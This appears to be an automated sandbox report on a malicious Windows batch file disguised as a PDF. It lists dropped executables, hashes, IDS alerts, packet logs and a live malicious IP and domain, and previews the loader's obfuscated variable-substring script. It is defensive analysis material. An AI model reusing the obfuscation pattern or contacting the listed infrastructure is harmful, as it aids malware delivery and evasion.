https://www.veeble.org/contact/	Host.COM, 0000000B.00000003.2398663811.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1839562025.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787517940.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311655958.000000000069B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444396121.0000000000843000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1487910197.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2012719233.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1658976901.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1705162095.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2440234813.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2484438938.0000000000844000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2269059652.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1787397527.00000000008B8000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2311676740.0000000000683000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1444362085.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573365210.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2098183283.0000000000681000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000002.2573219588.0000000000680000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.2398437375.000000000068B000.00000004.00000020.00020000.00000000.sdmp, Host.COM, 0000000B.00000003.1966265756.00000000008C7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.170.55.202	taksonsdfg.co.in	United States		20454	SSASN2US	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1562925
Start date and time:	2024-11-26 09:37:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	78326473_PDF.cmd
Detection:	MAL
Classification:	mal100.bank.troj.evad.winCMD@22/11@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 60 Number of non-executed functions: 209
Cookbook Comments:	Found application associated with file extension: .cmd

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: 78326473_PDF.cmd

Simulations

Behavior and APIs

Time	Type	Description
03:38:09	API Interceptor	29x Sleep call for process: Host.COM modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
108.170.55.202	6BE4RDldhw.exe	Get hash	malicious	DBatLoader	Browse
	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8	Get hash	malicious	HTMLPhisher	Browse
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse
	241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse
	Julcbozqsvtzlo.cmd	Get hash	malicious	Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe	Browse
	Uduknnywyznljn.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	IN-34823_PO39276-pdf.vbe	Get hash	malicious	Remcos, DBatLoader	Browse
	Products_Specification.XLs.PIF.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	PAYMENT SWIFT.XLs.exe	Get hash	malicious	AveMaria, DBatLoader, UACMe	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
taksonsdfg.co.in	6BE4RDldhw.exe	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202
	241481565-044416-sanlccjavap0003-6624_PDF.TXT.PNG.MPEG.CMD.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202
	Julcbozqsvtzlo.cmd	Get hash	malicious	Remcos, AveMaria, DBatLoader, PrivateLoader, UACMe	Browse	108.170.55.202

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SSASN2US	6BE4RDldhw.exe	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	198.15.97.148
	https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8	Get hash	malicious	HTMLPhisher	Browse	108.170.55.202
	5.hta	Get hash	malicious	Unknown	Browse	131.153.13.235
	nabmips.elf	Get hash	malicious	Unknown	Browse	64.38.201.185
	la.bot.arm5.elf	Get hash	malicious	Unknown	Browse	108.170.53.110
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	198.15.73.56
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse	108.170.55.202
	AGjaVihni8.elf	Get hash	malicious	Mirai, Gafgyt	Browse	66.85.144.18
	GestionPagoAProveedores_100920241725998901306_PDF.cmd	Get hash	malicious	Remcos, DBatLoader, FormBook	Browse	108.170.55.202

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Doc261124.vbs	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	108.170.55.202
	FHG538JGH835DG86S.doc	Get hash	malicious	Unknown	Browse	108.170.55.202
	RemittanceAdvice35282-17.xll.dll	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	108.170.55.202
	file.exe	Get hash	malicious	LummaC Stealer	Browse	108.170.55.202
	file.exe	Get hash	malicious	Unknown	Browse	108.170.55.202
	EPTMAcgvNZ.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	108.170.55.202
	AWkpqJMxci.exe	Get hash	malicious	Remcos, DBatLoader	Browse	108.170.55.202
	D2pQ4J4GGZ.exe	Get hash	malicious	Remcos, DBatLoader	Browse	108.170.55.202
	C6dAUcOA6M.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	108.170.55.202
	2jbMIxCFsK.exe	Get hash	malicious	AgentTesla, DBatLoader	Browse	108.170.55.202

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\alpha.exe	iuhmzvlH.cmd	Get hash	malicious	Unknown	Browse
	USD470900_COPY_800BLHSBC882001.PDF.bat	Get hash	malicious	Remcos, DBatLoader	Browse
	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd	Get hash	malicious	Unknown	Browse
	#U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd	Get hash	malicious	DBatLoader, FormBook	Browse
	TZH3Uk8x45.bat	Get hash	malicious	DBatLoader, PureLog Stealer, XWorm	Browse
	Payment.cmd	Get hash	malicious	Azorult, DBatLoader	Browse
	FACTURA.cmd	Get hash	malicious	DBatLoader	Browse
	rPO767575.cmd	Get hash	malicious	DBatLoader	Browse

Created / dropped Files

C:\Users\Public\Host.GIF

Process:	C:\Users\Public\kn.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4970080
Entropy (8bit):	3.7662406331652907
Encrypted:	false
SSDEEP:	24576:goGEeGJdhZCVJG00WQQkgfxRta+KKDe08GjcR:/
MD5:	9DCDD6E703F63872450A29843CC225D8
SHA1:	DEADA0C9B2A7059B01958F0CBD173A77182BD03A
SHA-256:	A36432DC3DFE90959DC37FC8124BD6D292391569E071C2B3BE67A53531A2AACE
SHA-512:	E53354A5F917ABC8C36F43E79DDEC53E2B8D6EE8F1A38B7C5F777751C8F34EB8E53F03C633B20FCA6993031B78BAB5D454FAACCDF8BCB5782C77876D8F08AD50
Malicious:	false
Preview:	0000.4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00..0010.b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00..0020.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0030.00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00..0040.ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90..0050.54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73..0060.74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57..0070.69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00..0080.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0090.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00a0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00b0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00c0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00d0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00e0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..00f0.00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00..0100.50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00..0110.00 00 00 00 e0 00 8e 81 0b 01 02 19 00 ca 05 00..0120.00 c8

C:\Users\Public\Libraries\Host.COM

Process:	C:\Users\Public\kn.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1414656
Entropy (8bit):	7.267732796117887
Encrypted:	false
SSDEEP:	24576:NoSnw6tsYL4kfl8hNlVkEUsprrwr6HSJAXv0E65vYZv/UdW3seBdZJ5:1jsHkEU8rsr6HSJSME6VXWzBN5
MD5:	7614CE01178ED3B6E66ECCBB0300FCF8
SHA1:	3774CF5B5A3060F1A02946DE4C192778D4256852
SHA-256:	F2ACF58A7B9BB7E4621A7187A6DB9F294A3EE0106C3A00D8CF6D55107DD19AE1
SHA-512:	E20E8CCAA3E16E1D573EB741FC4E7D27DE128D83DD9A504516C5FBEA23538B3ED5D02466898AF3762EE2837F9B4839454045A3FF6FA1FD0CB464DA0377E886A4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 68%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................@...................@...........................`...$... ..........................df...................................................f...............................text...p........................... ..`.itext.............................. ..`.data....$.......&..................@....bss.....6... ...........................idata...$...`...&..................@....tls....4................................rdata..............................@..@.reloc..df.......h..................@..B.rsrc........ ......................@..@.............@......................@..@................................................................................................

C:\Users\Public\alpha.exe

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	289792
Entropy (8bit):	6.135598950357573
Encrypted:	false
SSDEEP:	6144:k4WA1B9BxDfQWKORSqY4zOcmpdlc3gJdmtolSm:H1BhkWvSqY4zvmjOwJIT
MD5:	8A2122E8162DBEF04694B9C3E0B6CDEE
SHA1:	F1EFB0FDDC156E4C61C5F78A54700E4E7984D55D
SHA-256:	B99D61D874728EDC0918CA0EB10EAB93D381E7367E377406E65963366C874450
SHA-512:	99E784141193275D4364BA1B8762B07CC150CA3CB7E9AA1D4386BA1FA87E073D0500E61572F8D1B071F2FAA2A51BB123E12D9D07054B59A1A2FD768AD9F24397
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: iuhmzvlH.cmd, Detection: malicious, Browse Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 12#U00b711#U00b72024#U00b7Pdf.cmd, Detection: malicious, Browse Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s 06.11.2024.cmd, Detection: malicious, Browse Filename: TZH3Uk8x45.bat, Detection: malicious, Browse Filename: Payment.cmd, Detection: malicious, Browse Filename: FACTURA.cmd, Detection: malicious, Browse Filename: rPO767575.cmd, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........OH...&...&...&..V...&..E%...&..E"...&...'../&..E'...&..E#...&..E+...&..E....&..E$...&.Rich..&.................PE..d...S.............".................P..........@.............................p............`.................................................(...................4#...........`......`Z..T............................,...............4...... ........................text............................... ..`.rdata..<.... ......................@..@.data...P...........................@....pdata..4#.......$..................@..@.didat..............................@....rsrc...............................@..@.reloc.......`.......h..............@..B........................................................................................................................................................................................................................

C:\Users\Public\kn.exe

Process:	C:\Windows\System32\extrac32.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	1651712
Entropy (8bit):	6.144018815244304
Encrypted:	false
SSDEEP:	24576:MeiElH5YZ5cv6r3HiaZQ8p4XGwiJDgN7MaikGLIsWWi4pT/Y/7hsyDAP760MKR:Me3lZYUvmSu4XTckYD0sWWiwT/MhTzK
MD5:	F17616EC0522FC5633151F7CAA278CAA
SHA1:	79890525360928A674D6AEF11F4EDE31143EEC0D
SHA-256:	D252235AA420B91C38BFEEC4F1C3F3434BC853D04635453648B26B2947352889
SHA-512:	3ED65172159CD1BCC96B5A0B41D3332DE33A631A167CE8EE8FC43F519BB3E2383A58737A41D25AA694513A68C639F0563A395CD18063975136DE1988094E9EF7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u}{h1..;1..;1..;..;0..;%w.:2..;%w.:*..;%w.:!..;%w.:...;1..;...;%w.:...;%w.;0..;%w.:0..;Rich1..;................PE..d...+. H.........."..................L.........@....................................q.....`.......... ......................................@Q.......`..@........x..............l'..p5..T...........................`(..............x)......XC.......................text............................... ..`.rdata..T...........................@..@.data....&..........................@....pdata...x.......z...\|..............@..@.didat.......P......................@....rsrc...@....`......................@..@.reloc..l'.......(..................@..B........................................................................................................................................................................................................................

\Device\Null

Process:	C:\Users\Public\alpha.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	4.403504238247217
Encrypted:	false
SSDEEP:	3:HnRthLK5aTRECUAdROGCOwXWnjTRrGIAOFZRMQcv:HRoAREYTOGjHVF+
MD5:	E14D0D771A7FEB9D78EA3DCA9197BA2A
SHA1:	48E363AAD601D9073D803AA9D224BF9A7FC39119
SHA-256:	0C13A861207709C246F13ACE164529F31F2F91CF14BD37795192D5B37E965BE6
SHA-512:	3460F93FEA31D68E49B1B82EDCB8A2A9FCCE34910DD04DEE7BD7503DB8DAB6D1D5C73CBD2C15156DCB601512AD68DE6FEF7DCB8F8A72A8A0747248B378C17CF9
Malicious:	false
Preview:	The system cannot find message text for message number 0x400023a1 in the message file for Application...

Static File Info

General

File type:	ISO-8859 text, with very long lines (956), with CRLF line terminators
Entropy (8bit):	5.0998241591161575
TrID:
File name:	78326473_PDF.cmd
File size:	7'182'316 bytes
MD5:	2152288a44df543c12a71a50df1ed7b6
SHA1:	3d9f4c31f2366d2e75b5d6de5eb790da8bf07f1e
SHA256:	08eff0bb7bf2a683834cba1a3602e59ab3e803ce18e2998bd944ad06ec0e2736
SHA512:	32558f9fb65ca2adbbd572024f79fee514241b3b5bc35a09e62d0f622955da0f64ab7dd1697621cfa6492095711113408c0b5b619d3beb9fa960746b3ec07b6a
SSDEEP:	49152:NL4RD6gKgoYnqvkzd7uTu1DfSYr6EuG+1y3OgKVUGVpxRTw:Y
TLSH:	0D76A707E48F90E3670C53EF234F54448CA6E5B619AE7E50BBC6363C1E6298EFE45198
File Content Preview:	COMCOM..&@cls&@set "_...=DJcBebTEQGtSYd3yMnqU6HKs x1C5NmRI@9lwgZfrpVPahWz4F0X8oL2OkjiAuv7"..%_...:~33,1%%_...:~23,1%%_...:~4,1%%_...:~10,1%%_...:~24,1%"_...=%_...:~33,1%%_...:~53,1%%_...:~55,1%%_...:~16,1%%_...:~19,1%%_...:~35,1%%_...:~15,1%%_...:~3,1%%_.

File Icon


Icon Hash:	9686878b929a9886

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-26T09:38:13.488731+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49703	108.170.55.202	443	TCP
2024-11-26T09:38:15.373825+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49709	108.170.55.202	443	TCP
2024-11-26T09:38:17.658989+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49716	108.170.55.202	443	TCP
2024-11-26T09:38:19.684214+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49722	108.170.55.202	443	TCP
2024-11-26T09:38:22.202203+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49730	108.170.55.202	443	TCP
2024-11-26T09:38:24.042666+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49737	108.170.55.202	443	TCP
2024-11-26T09:38:26.793550+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49746	108.170.55.202	443	TCP
2024-11-26T09:38:28.718305+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49752	108.170.55.202	443	TCP
2024-11-26T09:38:31.131811+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49759	108.170.55.202	443	TCP
2024-11-26T09:38:33.055290+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49765	108.170.55.202	443	TCP
2024-11-26T09:38:35.392041+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49772	108.170.55.202	443	TCP
2024-11-26T09:38:37.301990+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49776	108.170.55.202	443	TCP
2024-11-26T09:38:39.542893+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49783	108.170.55.202	443	TCP
2024-11-26T09:38:41.373681+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49787	108.170.55.202	443	TCP
2024-11-26T09:38:43.663701+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49794	108.170.55.202	443	TCP
2024-11-26T09:38:45.769416+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49799	108.170.55.202	443	TCP
2024-11-26T09:38:48.052720+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49806	108.170.55.202	443	TCP
2024-11-26T09:38:49.949514+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49812	108.170.55.202	443	TCP
2024-11-26T09:38:52.289192+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49819	108.170.55.202	443	TCP
2024-11-26T09:38:54.212645+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49825	108.170.55.202	443	TCP
2024-11-26T09:38:56.622773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49832	108.170.55.202	443	TCP
2024-11-26T09:38:58.920053+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49838	108.170.55.202	443	TCP
2024-11-26T09:39:01.454782+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49845	108.170.55.202	443	TCP
2024-11-26T09:39:03.329019+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49851	108.170.55.202	443	TCP
2024-11-26T09:39:05.597669+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49858	108.170.55.202	443	TCP
2024-11-26T09:39:07.526693+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49866	108.170.55.202	443	TCP
2024-11-26T09:39:09.878954+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49874	108.170.55.202	443	TCP
2024-11-26T09:39:11.922607+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49879	108.170.55.202	443	TCP
2024-11-26T09:39:14.318187+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49886	108.170.55.202	443	TCP
2024-11-26T09:39:16.447525+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49890	108.170.55.202	443	TCP
2024-11-26T09:39:18.880685+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49899	108.170.55.202	443	TCP
2024-11-26T09:39:20.770117+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49903	108.170.55.202	443	TCP
2024-11-26T09:39:23.216540+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49910	108.170.55.202	443	TCP
2024-11-26T09:39:25.038371+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49916	108.170.55.202	443	TCP
2024-11-26T09:39:27.364917+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49923	108.170.55.202	443	TCP
2024-11-26T09:39:29.278485+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49928	108.170.55.202	443	TCP
2024-11-26T09:39:31.812672+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49936	108.170.55.202	443	TCP
2024-11-26T09:39:33.729744+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49941	108.170.55.202	443	TCP
2024-11-26T09:39:35.982733+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49948	108.170.55.202	443	TCP
2024-11-26T09:39:37.956949+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49952	108.170.55.202	443	TCP
2024-11-26T09:39:40.240537+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49959	108.170.55.202	443	TCP
2024-11-26T09:39:42.172799+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49965	108.170.55.202	443	TCP
2024-11-26T09:39:44.466544+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49972	108.170.55.202	443	TCP
2024-11-26T09:39:46.407698+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49978	108.170.55.202	443	TCP
2024-11-26T09:39:48.739992+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49985	108.170.55.202	443	TCP
2024-11-26T09:39:50.961356+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49991	108.170.55.202	443	TCP
2024-11-26T09:39:53.255157+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49998	108.170.55.202	443	TCP
2024-11-26T09:39:55.081655+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50004	108.170.55.202	443	TCP
2024-11-26T09:39:57.361369+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50011	108.170.55.202	443	TCP
2024-11-26T09:39:59.231464+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50015	108.170.55.202	443	TCP
2024-11-26T09:40:01.568741+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50021	108.170.55.202	443	TCP
2024-11-26T09:40:03.414641+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50025	108.170.55.202	443	TCP
2024-11-26T09:40:06.069106+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50032	108.170.55.202	443	TCP
2024-11-26T09:40:08.003114+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50037	108.170.55.202	443	TCP
2024-11-26T09:40:10.645305+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50044	108.170.55.202	443	TCP
2024-11-26T09:40:12.532491+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	50049	108.170.55.202	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 26, 2024 09:38:11.959844112 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:11.959876060 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:11.959959984 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:11.984653950 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:11.984708071 CET	443	49702	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:11.987838030 CET	49702	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:12.047992945 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:12.048021078 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:12.048083067 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:12.060780048 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:12.060801983 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.488643885 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.488730907 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:13.491528988 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:13.491539001 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.491921902 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.535357952 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:13.583334923 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.992522955 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.992710114 CET	443	49703	108.170.55.202	192.168.2.7
Nov 26, 2024 09:38:13.992850065 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:13.998425007 CET	49703	443	192.168.2.7	108.170.55.202
Nov 26, 2024 09:38:13.998450041 CET	443	49703	108.170.55.202	192.168.2.7
